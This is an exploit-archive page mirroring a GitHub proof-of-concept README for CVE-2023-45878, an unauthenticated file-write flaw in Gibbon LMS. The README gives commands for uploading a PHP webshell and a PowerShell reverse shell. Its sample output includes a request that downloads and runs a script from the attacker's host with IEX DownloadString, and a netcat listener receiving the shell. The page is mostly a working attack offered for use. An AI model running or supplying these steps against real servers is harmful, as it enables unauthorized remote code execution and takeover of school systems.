Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45878 PoC — Gibbon 安全漏洞

Source
https://github.com/PaulDHaes/CVE-2023-45878-POC
Associated Vulnerability
Title:Gibbon 安全漏洞 (CVE-2023-45878)
Description:GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).
Description
CVE-2023-45878 poc for gibbon LMS on xampp windows
Readme
# CVE-2023-45878-POC
CVE-2023-45878 poc for gibbon LMS on xampp windows.
Upload a webshell called shell.php for command injection.
For reverse shell uploads a powershell reverse shell ps1 script called shell.ps1 which is uploaded to the target machine using the shell.php.

# Requirments
Python3
Requests python3 module
netcat
```
pip3 install requests
```
## Virtual env
```shell
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
```

# Usage
Tested on Gibbon LMS that was running in XAMPP windows no AV enabled.
Target can be found using the login page of Gibbon example http://gibbon-example/Gibbon-LMS/

## Reverse shell
```shell
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>
```

## Single command
```shell
python3 reverse.py --single -target_url http://target -command whoami
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice
```

# Credits
https://herolab.usd.de/security-advisories/usd-2023-0025/
File Snapshot

 [4.0K]  /data/pocs/9108c23b5dc95d7e0fc9ad4a533f8278713687f1
├── [6.6K]  CVE-2023-45878.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →